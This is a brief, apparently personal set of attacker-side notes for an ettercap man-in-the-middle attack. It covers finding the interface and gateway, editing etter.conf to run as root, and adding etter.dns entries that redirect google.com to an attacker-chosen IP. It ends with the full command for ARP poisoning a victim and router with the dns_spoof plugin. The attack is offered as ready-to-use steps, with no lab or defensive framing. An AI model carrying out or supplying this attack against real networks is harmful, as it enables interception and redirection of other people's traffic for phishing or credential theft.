in Attackers side :
Look interface name with ifconfig (where ip address is present)
Find router IP with route -n (under gateway section)
Edit /etc/ettercap/etter.conf :
set -->
ec_uid = 0
ec_gid = 0
and uncomment 4 lines in "linux section"Edit /etc/ettercap/etter.dns with :
google.com A (targetIP)
*.google.com A (target IP)
www.google.com PTR (target IP)then run :
sudo ettercap -T -q -i (interface) -M arp:remote /(Victim)// /(Router)// -P dns_spoofin macos :
/opt/homebrew/o/ettercap/.bottle/etc/ettercap/ettercap.dns location